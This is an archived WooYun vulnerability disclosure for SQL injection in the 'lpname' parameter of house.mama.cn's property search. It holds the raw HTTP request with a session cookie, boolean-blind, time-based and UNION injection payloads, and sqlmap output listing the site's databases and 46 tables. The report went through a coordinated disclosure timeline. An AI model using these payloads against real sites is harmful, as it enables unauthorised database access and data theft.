乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-22: 细节已通知厂商并且等待厂商处理中 2015-11-26: 厂商已经确认,细节仅向厂商公开 2015-12-06: 细节向核心白帽子及相关领域专家公开 2015-12-16: 细节向普通白帽子公开 2015-12-26: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
POST /index.php?a=index&&g=Loupan&m=Search HTTP/1.1Content-Length: 198Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://house.mama.cnCookie: PHPSESSID=1hva6rnsv4n5qbvd1bgms9kk45; liveCity=gz; xloginmama_service=http%253A%252F%252Fhouse.mama.cn; MAMADATA53=mama_rp=0&si=c0f92e0a5686619288df116ad6a96749<ime=1448121306945&rtime=0&sinfid=1&sinpage=__&location=http%3A%2F%2Fhouse.mama.cn%2F; zbd10_Loupan-Search-index=1; zbd10_House-Index-index=1Host: house.mama.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*areaid=&lpid=0&lpname=-1&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
lpname参数存在注入
sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:---Parameter: lpname (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: areaid=&lpid=0&lpname=-7778') OR 6498=6498 AND ('qDIr'='qDIr&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: areaid=&lpid=0&lpname=-1') AND SLEEP(5) AND ('BjkF'='BjkF&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid= Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: areaid=&lpid=0&lpname=-1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786271,0x4d44627454694f5772506b7a7a626b446546735a6762665a52685358545573637a6562657a726c67,0x7171706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=---web application technology: Nginx, PHP 5.3.27back-end DBMS: active fingerprint: MySQL >= 5.5.0 banner parsing fingerprint: MySQL 5.6.23, logging enabledbanner: '5.6.23-log'
web application technology: Nginx, PHP 5.3.27back-end DBMS: active fingerprint: MySQL >= 5.5.0 banner parsing fingerprint: MySQL 5.6.23, logging enabledbanner: '5.6.23-log'available databases [11]:[*] baby_grow[*] home[*] house_mamadb[*] information_schema[*] jiaju_del[*] mama_living_expense[*] mamaPhoto_del[*] mysql[*] performance_schema[*] pinpai[*] test
Database: house_mamadb[46 tables]+---------------------------+| h_admin_user || housesina_art || housesina_art_1 || housewangyi_photo || hs_category || hs_category_config || hs_city || hs_collect_data || hs_collect_data_content || hs_collect_rule || hs_collect_source || hs_collect_source_cate || hs_edit_block || hs_edit_block_bk20121103 || hs_edit_history || hs_forum_house_thread || hs_house_loupan_link_cate || hs_house_loupan_link_list || hs_house_tclink_cate || hs_house_tclink_list || hs_loupan || hs_loupan_developer || hs_loupan_group || hs_loupan_info || hs_loupan_map || hs_loupan_paihang || hs_loupan_price || hs_loupan_tongji || hs_news || hs_news_20110908 || hs_news_cate || hs_news_comments || hs_news_hot || hs_news_pic || hs_news_tongji || hs_news_tongji_detail || hs_news_zt_cate || hs_news_zt_list || hs_photo_cate || hs_photo_pic || hs_photo_tongji || hs_photo_tuku || hs_sends || hs_tuan || hs_tuan_activity || hs_tuan_activity_pic |+---------------------------+
求高rank...
危害等级:中
漏洞Rank:8
确认时间:2015-11-26 22:58
非常感谢
暂无